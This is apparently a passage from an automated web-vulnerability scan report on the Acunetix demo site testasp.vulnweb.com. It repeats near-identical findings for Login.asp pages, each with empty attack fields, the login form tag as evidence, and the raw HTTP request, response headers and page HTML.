<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=45 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=46 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=48 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=49 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=50 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=51 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" 